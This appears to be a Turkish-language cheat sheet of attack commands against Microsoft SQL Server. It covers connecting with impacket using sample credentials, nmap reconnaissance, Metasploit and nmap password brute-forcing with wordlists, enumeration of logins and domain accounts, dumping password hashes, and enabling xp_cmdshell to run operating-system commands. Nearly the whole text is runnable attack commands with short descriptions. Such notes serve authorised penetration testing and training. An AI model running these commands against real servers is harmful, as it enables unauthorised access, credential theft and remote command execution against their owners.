Bağlantı
# GUI
navicat
# Manuel
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
Basit Bilgiler
MSSQL sunucusu üzerinde genel bilgileri almak için kullanılır.
nmap --script ms-sql-info -p 1433 192.168.1.3
MSSQL sunucusu hakkında NTLM bilgilerini elde etmek için kullanılır.
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.3
Brute Force
MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar.
msfconsole -q
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.3
set USER_FILE /root/Desktop/wordlist/common_users.txt
set PASS_FILE /root/Desktop/wordlist/100-common-passwords.txt
set VERBOSE false
exploit
MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar.
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.3
MSSQL sunucusunda boş şifreleri kontrol etmek için kullanılır.
nmap -p 1433 --script ms-sql-empty-password 192.168.1.3
Kullanıcı Listeleme
Bütün MSSQL kullanıcılarını listeler.
msfconsole -q
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS 192.168.1.3
exploit
MSSQL sunucu üzerindeki domain hesap bilgilerinin toplanması.
msfconsole -q
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS 192.168.1.3
exploit
MSSQL sunucusundaki kullanıcı şifre hash'lerini çıkarmak için kullanılır.
nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria 192.168.1.3
Komut Çalıştırma
impacket-mssqlclient Administrator:Pass123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';